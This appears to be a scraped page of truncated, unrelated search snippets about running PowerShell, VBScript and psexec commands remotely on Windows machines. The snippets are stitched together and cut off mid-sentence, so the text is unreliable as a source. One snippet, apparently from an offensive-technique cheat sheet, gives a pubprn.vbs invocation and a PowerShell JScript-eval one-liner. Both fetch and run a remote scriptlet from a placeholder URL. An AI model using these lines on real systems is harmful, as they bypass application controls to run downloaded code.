The powershell script should keep running until it requires the completion of the batch files. Additionally, if someone knows how to execute a command in the background, it is not necessary to use powershell. Thanks for any help. One possible solution is to use Invoke-Command's -asjob com...
Add routes remotely Via Powershell Add semicolon in powershell report Add shared printer from Powershell, driver cannot be retrieved from the server Add switches to powershell script add text to the start of a line Add the same firewall rule with netsh and with PowerShell Add User Account -...
Running a powershell command from the sysvol on logon from Win10 workstations Running gpresult remotely only for computer policies running gpresult returns "ERROR: Not found." running net time /set in script Running Screen Saver from a network location Running script with offline computer Runnin...
Termux SSH helps you to setup SSH server on termux application on android, which helps you to execute tasks remotely through terminal/cmd/powershell/termux. - dmdhrumilmistry/Termux-SSH
pubprn.vbs script:http://url/file.sct Microsoft.JScript.Eval Assembly via PowerShell[Reference] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:http://url/file.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]:...
name:Run a PowerShell script with\somescript.ps1args:no_profile:true Return Values Common return values are documentedhere, the following are the fields unique to this module: Key Description cmd
I am running below code in powershell as administrator to package msi to msix using msixpackagingtool.exe using powershell. ...
Some PowerShell cmdlets used to carry out cyberattacks include Invoke-Command or Start-Process. Invoke-Command is used to execute a command remotely and Start-Process is used to run an Domain discovery: Once the attackers have penetrated the enterprise network, they can use certain cmdlets to ...
From PowerShell, run a VBscript on a remote workstation, pass some parameters and log the result: $script='C:\Program Files\demo.vbs' $args = "some more stuff" & psexec.exe -s \\workstation64 "c:\windows\system32\cscript.exe" $script $args /log 'C:\logs\demo.txt' ...
But if - as it really looks - you just want to remotely run a command, then it would be worth looking at something like Powershell or psexec. But be aware that your example script will have problems, because it requires the calling thread to have a very specific privilege - SeShutdown...